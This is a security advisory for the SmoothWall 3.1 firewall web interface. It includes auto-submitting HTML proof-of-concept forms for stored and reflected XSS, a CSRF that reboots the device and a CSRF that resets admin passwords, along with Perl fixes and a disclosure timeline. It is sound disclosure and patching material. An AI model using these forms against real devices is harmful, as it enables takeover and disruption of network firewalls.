
SmoothWall 3.1 Cross Site Request Forgery / Cross Site Scripting

Posted Dec 22, 2014
Authored by Yann CAM

SmoothWall version 3.1 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
MD5 | e453929ef60fcd0ecf00e8d7a5b5b814

######################################################################
# Exploit Title: SmoothWall 3.1 Multiple vulnerabilities
# Date: 21/12/2014
# Author: Yann CAM @ Synetis
# Vendor or Software Link: www.smoothwall.org - www.smoothwall.org/download/
# Version: 3.1
# Category: CSRF (password reset, reboot) & persistent XSS
# Google dork:
# Tested on: Smoothwall Linux distribution
######################################################################


Smoothwall firewall/router distribution description :
======================================================================

Smoothwall is a Linux distribution designed to be used as an open source firewall. Designed for ease of use, Smoothwall is configured via a web-based GUI, and requires little or no knowledge of Linux to install or use.
Smoothwall is also a private software company based in the UK that develops firewall and web content filtering software, and which also maintains the SmoothWall open source project.

Version 3.0 SP3 contains several persistent XSS and CSRF vulnerabilities (tested in March 2013). Dave B had already published XSS PoCs on January 17, 2011 (Exploit-DB 16006), and they have never been corrected.
This advisory adds new persistent XSS vectors and PoCs with a similar impact. SmoothWall 3.1, released in October 2014, is still affected by these attack vectors.

The SmoothWall web GUI is protected only by HTTP Basic Authentication (htaccess), with no session cookie and no anti-CSRF token. Once an administrator has authenticated, the browser silently attaches the cached Basic Auth credentials to every request to that host, including requests triggered by a form on an attacker's page, so every state-changing page is CSRF vulnerable.
The httpd daemon listens on HTTP on port 81 and HTTPS on port 441.


Proof of Concept 1 :
======================================================================

Persistent XSS through POST; affects SmoothWall 3.0 SP3 and 3.1.

File /httpd/cgi-bin/pppsetup.cgi line 365 :
print "\t<OPTION VALUE='$c' $selected{'PROFILE'}{$c}>$profilenames[$c]\n";

PoC:

<html>
<body>
<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/pppsetup.cgi' method='post'>
<input type='hidden' name='PROFILENAME' value='<script>alert(/XSS from Yann CAM @ Synetis/);</script>' />
<input type='hidden' name='PROFILE' value='1' />
<input type='hidden' name='COMPORT' value='ttyS0' />
<input type='hidden' name='DTERATE' value='9600' />
<input type='hidden' name='TELEPHONE' value='' />
<input type='hidden' name='DIALMODE' value='T' />
<input type='hidden' name='MAXRETRIES' value='' />
<input type='hidden' name='TIMEOUT' value='' />
<input type='hidden' name='USERNAME' value='' />
<input type='hidden' name='PASSWORD' value='' />
<input type='hidden' name='AUTH' value='pap-or-chap' />
<input type='hidden' name='LOGINSCRIPT' value='' />
<input type='hidden' name='ACTION' value='Save' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>

This XSS is persistent in the /cgi-bin/pppsetup.cgi page and also in /cgi-bin/logs.cgi/log.dat, because the unsanitized profile name is written to the log by lines such as the following (many occurrences in /httpd/cgi-bin/pppsetup.cgi):
&log("$tr{'profile deleted'} $pppsettings{'PROFILENAME'}");


Proof of Concept 2 :
======================================================================

Persistent XSS through POST; affects SmoothWall 3.0 SP3.

File /httpd/cgi-bin/vpn.cgi/vpnconfig.dat line 258 :
<td colspan='3'><strong>$tr{'commentc'}</strong> $temp[8]</td>

PoC:

<html>
<body>
<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/vpn.cgi/vpnconfig.dat' method='post'>
<input type='hidden' name='SECRET1' value='x' />
<input type='hidden' name='SECRET2' value='x' />
<input type='hidden' name='COMMENT' value='<script>alert(/XSS from Yann CAM @ Synetis/);</script>' />
<input type='hidden' name='ACTION' value='Add' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>

Detail :
$temp[8] (the stored COMMENT field of the VPN connection) is not sanitized before being printed. The XSS is persistent in this page.


Proof of Concept 3 :
======================================================================

Persistent XSS through POST; affects SmoothWall 3.0 SP3 and 3.1.

File /httpd/cgi-bin/ddns.cgi line 273 :
&displaytable($filename, \%render_settings, $cgiparams{'ORDER'}, $cgiparams{'COLUMN'} );

PoC:

<html>
<body>
<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/ddns.cgi' method='post'>
<input type='hidden' name='COMMENT' value='<script>alert(/XSS from Yann CAM @ Synetis/);</script>' />
<input type='hidden' name='ACTION' value='Add' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>

Detail :
All POST parameters are passed to the &displaytable() function without any sanitization. The COMMENT variable allows a persistent XSS in this page.


Proof of Concept 4 :
======================================================================

Non-persistent (reflected) XSS through POST, reported by Dave B and not corrected since 2011. Affects SmoothWall 3.0 SP3 and 3.1.

File /httpd/cgi-bin/ipinfo.cgi lines 76 and 101 :
&openbox("$addr ($hostname)");

PoC:

<html>
<body>
<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/ipinfo.cgi' method='post'>
<input type='hidden' name='IP' value='<script>alert(/XSS from Yann CAM @ Synetis/);</script>' />
<input type='hidden' name='ACTION' value='Run' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>

Detail :
$addr is not sanitized before being printed in the page. This is a non-persistent XSS: the payload is only reflected in the response to the request that carries it, which is why the PoC submits the form automatically.

Proof of Concept 5 :
======================================================================

CSRF that reboots the SmoothWall, reported by Dave B and not corrected since 2011. Affects SmoothWall 3.0 SP3 and 3.1.

File /httpd/cgi-bin/shutdown.cgi

PoC:

<html>
<body>
<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/shutdown.cgi' method='post'>
<input type='hidden' name='ACTION' value='Reboot' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>


Proof of Concept 6 :
======================================================================

CSRF that changes the SmoothWall admin and dial account passwords. Affects SmoothWall 3.0 SP3 and 3.1.

File /httpd/cgi-bin/changepw.cgi

The new password must be at least 6 alphanumeric characters, and both fields of each pair must match.

PoC:

<html>
<body>
<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/changepw.cgi' method='post'>
<input type='hidden' name='ADMIN_PASSWORD1' value='newpassword' />
<input type='hidden' name='ADMIN_PASSWORD2' value='newpassword' />
<input type='hidden' name='DIAL_PASSWORD1' value='newpassword' />
<input type='hidden' name='DIAL_PASSWORD2' value='newpassword' />
<input type='hidden' name='ACTION_DIAL' value='Save' />
<input type='hidden' name='ACTION_ADMIN' value='Save' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>


How to prevent and protect against these vulnerabilities ?
======================================================================

For example, for PoC n°1 in the file /httpd/cgi-bin/pppsetup.cgi :

To protect SmoothWall from XSS, import the CGI module (which exports the escapeHTML() helper) at the top of each vulnerable page (such as pppsetup.cgi) :
use CGI qw(:standard);

Then, at line 365, HTML-encode $profilenames[$c] at the point where it is printed :
print "\t<OPTION VALUE='$c' $selected{'PROFILE'}{$c}>" . escapeHTML($profilenames[$c]) . "\n";

And for the log page, sanitize the value in every call to the log function in the file :
&log("$tr{'profile deleted'} " . escapeHTML($pppsettings{'PROFILENAME'}));

Note that encoding at write time only protects logs.cgi if every writer of the log does it; encoding the field where logs.cgi prints it covers all writers at once and keeps the log a faithful record of what was actually submitted.

Finally, to prevent CSRF, add an anti-CSRF token to every form and verify it on every POST, or at least check the Referer of each request before using POST variables (as the IPCop firewall/router distribution, originally a SmoothWall fork, does). A Referer check is the weaker of the two: the header may be stripped by proxies or browser privacy settings, so a per-user token is preferred.
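As an added example (not SmoothWall's code and not part of the original advisory), the following Perl CGI fragment puts the two fixes above together and also addresses the Basic-Auth CSRF problem described in the introduction: it HTML-encodes untrusted values at output time, encodes log lines when they are rendered rather than when they are written, and adds a synchronizer token bound to the Basic Auth user name, with an Origin/Referer check as defence in depth. The parameter name CSRF_TOKEN, the secret, and the helper names are assumptions; in a real SmoothWall the token would have to be added to every form and checked in every ACTION handler.

```perl
#!/usr/bin/perl
# Added example (not SmoothWall code): output encoding + CSRF defence for a
# SmoothWall-style CGI page served under HTTP Basic Auth. The parameter name
# CSRF_TOKEN, the secret and the helper names are hypothetical.
use strict;
use warnings;
use CGI qw(:standard);
use Digest::SHA qw(hmac_sha256_hex);

# Hypothetical per-installation secret. On a real box this would be read from
# a root-only file generated at install time, never a literal in the script.
my $SECRET = 'replace-with-random-install-secret';

# Token bound to the Basic Auth user. The GUI has no session cookie, so the
# authenticated user name is the only per-principal value the server holds;
# binding to it stops a token minted for one account being replayed as another.
sub csrf_token {
    my ($user) = @_;
    return hmac_sha256_hex("csrf:$user", $SECRET);
}

# Constant-time comparison so the token check does not leak through timing.
sub tokens_equal {
    my ($x, $y) = @_;
    return 0 unless defined $x && defined $y && length $x == length $y;
    my $diff = 0;
    $diff |= ord(substr($x, $_, 1)) ^ ord(substr($y, $_, 1)) for 0 .. length($x) - 1;
    return $diff == 0;
}

# Reject state-changing POSTs that did not originate from our own GUI:
#   1. the form must carry a valid token (synchronizer token pattern);
#   2. as defence in depth, Origin/Referer, when present, must match Host.
# The Referer check alone is what the advisory credits IPCop with; the token is
# stronger because Referer may be stripped by proxies or privacy settings.
sub check_csrf {
    my ($user) = @_;
    return 1 unless request_method() eq 'POST';

    return 0 unless tokens_equal(param('CSRF_TOKEN'), csrf_token($user));

    my $host   = $ENV{'HTTP_HOST'} || '';
    my $source = $ENV{'HTTP_ORIGIN'} || $ENV{'HTTP_REFERER'} || '';
    if ($source ne '') {
        my ($src_host) = $source =~ m{^https?://([^/]+)}i;
        return 0 unless defined $src_host && lc($src_host) eq lc($host);
    }
    return 1;
}

# The vulnerable pattern from pppsetup.cgi (PoC 1): the attacker-supplied
# profile name is interpolated raw into the HTML ...
sub render_option_vulnerable {
    my ($c, $selected, $name) = @_;
    return "\t<OPTION VALUE='$c' $selected>$name\n";
}

# ... the hardened form HTML-encodes every untrusted value at output time.
# $c is encoded as well, since it also comes from the request.
sub render_option_safe {
    my ($c, $selected, $name) = @_;
    return "\t<OPTION VALUE='" . escapeHTML($c) . "' $selected>"
         . escapeHTML($name) . "\n";
}

# For the log page, encode when the line is *rendered* (logs.cgi), not when it
# is written: the log stays a faithful record and every reader is protected,
# not only the writers that remembered to pre-encode.
sub render_log_line {
    my ($line) = @_;
    return "<tr><td>" . escapeHTML($line) . "</td></tr>\n";
}

my $user = $ENV{'REMOTE_USER'} || 'admin';    # set by Basic Auth
print header(-type => 'text/html', -charset => 'UTF-8');

if (defined param('ACTION') && !check_csrf($user)) {
    print "<p>Request rejected: missing or invalid CSRF token.</p>\n";
    exit 0;
}

# Form with the token embedded. The cross-site PoC forms in this advisory
# cannot supply a valid token, so their POSTs are rejected above.
my $profile = defined param('PROFILENAME') ? param('PROFILENAME') : 'Default';
print "<form method='post'>\n",
      hidden(-name => 'CSRF_TOKEN', -value => csrf_token($user), -override => 1), "\n",
      "<select name='PROFILE'>\n",
      render_option_safe(1, 'SELECTED', $profile),
      "</select>\n",
      "<input type='submit' name='ACTION' value='Save'>\n</form>\n";
print render_log_line("profile deleted $profile");
```

Run it under the Basic-Auth-protected httpd as any other SmoothWall CGI; a POST from one of the PoC pages above arrives without CSRF_TOKEN and is rejected before any ACTION is processed, while a submission of the server-rendered form carries the token and passes. The Origin/Referer check is deliberately tolerant of an absent header so that privacy-conscious browsers still work; it only rejects when a header is present and names a foreign host.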


Additional note :
======================================================================

It is possible to upload an arbitrary file with custom content to the system, but the file is always renamed to /var/smoothwall/adsl/mgmt.o.
Use the upload form at : http://SMOOTHWALL_IP:81/cgi-bin/alcateladslfw.cgi

The htpasswd file holding the admin and dial credentials for the web GUI is located at : /var/smoothwall/auth/users


Solution:
======================================================================
2014-12-24 : None official. SmoothWall users need to apply the patch themselves.


Report timeline :
======================================================================

2013-03-26 : SmoothWall team alerted with details & PoC.
2013-04-09 : Second alert sent to the team.
2013-04-09 : First team response (06:00 pm), claiming to already know of these bugs and not to consider them issues.
2013-04-10 : Second team response (01:18 am), acknowledging the vulnerabilities but, I quote : "I was told that while this is a "potential" vulnerability it requires several things to happen for this to be an actual vulnerability."
2013-04-12 : My next response, with details on how to protect SmoothWall from these vulnerabilities and many links to CSRF attack references that rate them as critical.
2014-10-11 : SmoothWall 3.1 released, still affected by these issues.
2014-12-21 : Public advisory with some tips for patching manually (from Dave B.'s advisory in January 2011 to SmoothWall 3.1 in October 2014, there were no official patches).


Additional resources :
======================================================================

- www.smoothwall.org
- www.asafety.fr
- www.exploit-db.com/exploits/16006/
- www.securecoding.cert.org/confluence/display/perl/IDS33-PL.+Sanitize+untrusted+data+passed+across+a+trust+boundary


Credits :
======================================================================
Yann CAM - Security Consultant @ ASafety

--
CONTACT: www.asafety.fr

Comments (1)

fest3er

These five problems are fixed in the looming 3.1 Update 2 release. It will take longer to fix in Express 3.0, but the fixes are almost identical.

These problems all require prior authentication to the Smoothwall user interface, unless there is some wizardry beyond my ken.

Thank you for finding these. The PoC HTML snippets made it easy to locate and fix the problems.

Comment by fest3er, 2015-02-28 05:10:04 UTC
